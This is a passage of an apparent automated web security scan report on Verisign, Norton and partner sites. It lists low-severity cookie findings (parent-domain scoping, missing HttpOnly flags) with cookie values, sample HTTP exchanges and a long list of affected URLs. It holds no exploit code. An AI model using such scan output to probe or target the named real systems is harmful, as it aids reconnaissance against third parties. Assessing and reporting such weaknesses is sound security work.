Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.37. https://trust-center.verisign.com/process/retail/session_timeout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/session_timeout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.38. https://trust-center.verisign.com/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.39. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/assets/shared/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Set-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch
Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT
ETag: "2e58332-255-49a38c2aff480"
Accept-Ranges: bytes
Content-Length: 597
X-UA-Compatible: IE=EmulateIE7
Content-Type: image/gif

GIF89a    .    .....Bv...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/hp07/i/vlogo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hp07/i/vlogo.gif HTTP/1.1
Host: www.verisign.co.uk
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:05 GMT
Server: Apache
Set-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT
ETag: "29480d7-13e4-4a01df4a82a80"
Accept-Ranges: bytes
Content-Length: 5092
Content-Type: image/gif

GIF89aZ.)...."""..0.........DDD.........333........%UUU.........#. ..............-...-)*.........fff!..... .....www..(..#"..3/0......&"#.........\YZigh...0,-$ !*&'.............F..*.........PLM......M
...[SNIP]...

9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10. Cookie without HttpOnly flag set previous next
There are 118 instances of this issue:

https://admin.instantservice.com/Customer
https://admin.instantservice.com/links/5851/14753
https://admin.instantservice.com/links/5851/16144
https://admin.instantservice.com/links/5851/16145
https://admin.instantservice.com/links/5851/39897
http://buy.norton.com/
http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
http://buy.norton.com/estore/mf/landingProductFeatures
http://buy.norton.com/estore/mf/landingPromotion
http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
http://buy.norton.com/estore/mf/upgradeCenter
http://buy.norton.com/estore/mf/upgradeRenewal
http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
http://buy.norton.com/upgrades-renewals
https://idprotect.verisign.com/toolbar/activate.v
http://m.verisign.com/
http://mbox3.offermatica.com/m2/verisign/mbox/standard
https://onlinefamily.norton.com/familysafety/loginStart.fs
https://products.verisign.com/geocenter/reseller/doregister.do
https://products.verisign.com/geocenter/reseller/logon.do
https://products.verisign.com/geocenter/reseller/register.do
https://securitycenter.verisign.com/celp/enroll/outsideSearch
https://securitycenter.verisign.com/celp/enroll/retail
https://securitycenter.verisign.com/celp/enroll/upsell
https://trust-center.verisign.com/process/retail/session_timeout
http://us.norton.com/beta/index.jsp
http://us.norton.com/beta/overview.jsp
http://vipmobile.verisign.com/fpa/fpa.jsp
http://vipmobile.verisign.com/images/b_shadow.png
http://vipmobile.verisign.com/images/bl_shadow.png
http://vipmobile.verisign.com/images/br_shadow.png
http://vipmobile.verisign.com/images/dot.gif
http://vipmobile.verisign.com/images/home_rght_box.gif
http://vipmobile.verisign.com/images/r_shadow.png
http://vipmobile.verisign.com/images/rt_shadow.png
http://vipmobile.verisign.com/images/topleft.gif
https://vipmobile.verisign.com/fpa/fpa.jsp
http://buy.norton.com/
http://buy.norton.com/ps
http://buy.norton.com/special-promotions
http://buy.norton.com/support
http://buy.symanteccloud.com/freetrial
http://buy.symanteccloud.com/smbstore
http://com-verisign.netmng.com/
http://com-verisign.netmng.com//
http://free.pctools.com/res/js/utils.php
http://mbox3.offermatica.com/m2/verisign/mbox/standard
https://onlinefamily.norton.com/familysafety/basicpremium.fs
http://renewals.symantec.com/renewals/application
https://renewals.symantec.com/renewals/application
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/71097838/
http://sales.liveperson.net/hc/71097838/
http://sales.liveperson.net/hc/71097838/
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.ch/process/retail/trust_initial
https://trust-center.verisign.com/favicon.ico
https://trust-center.verisign.com/process/retail/console_login
https://trust-center.verisign.com/process/retail/help_and_support
https://trust-center.verisign.com/process/retail/redirect
https://trust-center.verisign.com/process/retail/trust_initial
https://trust-center.verisign.com/process/retail/trust_product_selector
https://trust-center.verisign.com/process/retail/trust_product_selector.do
https://trust-center.verisign.com/rcm/TeaLeafTarget.html
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
https://trust-center.verisign.com/rcm/verisign/images/divider.gif
https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
https://trust-center.verisign.com/rcm/verisign/images/logo.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
https://trust-center.verisign.com/rcm/verisign/images/truste.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
